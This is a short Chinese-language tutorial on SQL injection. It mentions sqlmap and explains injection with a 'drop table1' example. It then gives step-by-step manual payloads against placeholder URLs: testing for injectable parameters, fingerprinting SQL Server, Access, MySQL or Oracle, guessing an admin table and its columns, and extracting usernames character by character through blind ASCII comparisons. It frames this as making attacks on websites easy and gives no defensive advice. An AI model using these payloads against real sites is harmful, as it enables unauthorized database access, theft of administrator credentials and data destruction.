sqlmap

假如玩sql注入比较早的话，你会用过阿d，挖掘机...

但是最后还是sqlmap好用，搞网站突然Easy的很

存在注入的原因是因为后台在编写程序时，没有对用户输入的数据做过滤导致的，正如事实上，不是所有的用户都是友好的比如：用户在某个输入框提交的参数是 2，浏览器提交的URL为: http:// www.XXX.com/index.php?id=2 服务器后台执行SQL语句： select from table1 where id = 2;返回Response，浏览器解析返回的页面，然后你就看到新的页面了，如果邪恶的用户提交的参数是 2;drop table1 服务器后台执行SQL语句： select from table1 where id =2 ; drop table1 相当于后台执行了两条SQL语句，查表，并且把table1删除 - - 从而导致了SQL注入。按照这个思路，现在写一下手工注入的一般步骤：
- 判断是否存在注入点（数字型注入） www.XXX.com/index.php?id=2‘-- www.XXX.com/index.php?id=2 and 1=1 -- www.XXX.com/index.php?id=2 and 1=2 -- 第2条返回正常，第1，3条返回不正常说明id参数存在注入漏洞
- 判断数据库类型
  可以根据不同数据库特有的表，或者根据不同数据库的语法不同进行判断
  www.XXX.com/index.php?id=2 and exists(select * from sysobjects) -- 返回正常是SQLServer 数据库
  www.XXX.com/index.php?id=2 and exists(select * from msysobjects) -- 返回正常是Access 数据库
  www.XXX.com/index.php?id=2 and len('a') = 1 -- 返回正常是SQLServer或者MySQL
  www.XXX.com/index.php?id=2 and substring('abc','1','1') = a -- 返回正常是SQLServer
  www.XXX.com/index.php?id=2 and subStr('abc','1','1')= a -- 返回正常是Oracle
  知道是哪种类型数据库后就可以选择对应语法构造SQL语句进行攻击
- 判定是否存在admin表
  www.XXX.com/index.php?id=2 and exists(select * from admin) -- 返回正常存在admin表
- 猜admin表中的字段名
  www.XXX.com/index.php?id=2 and exists(select username from admin) -- 返回正常表示admin表存在username字段
- 猜字段值

www.XXX.com/index.php?id=2 and exists(select * from admin where id =1 and asc(mid(username,1,1))) < 100 -- 返回正常说明username中有ascii码小于100的字母，然后根据折半发准确判断是哪一个字符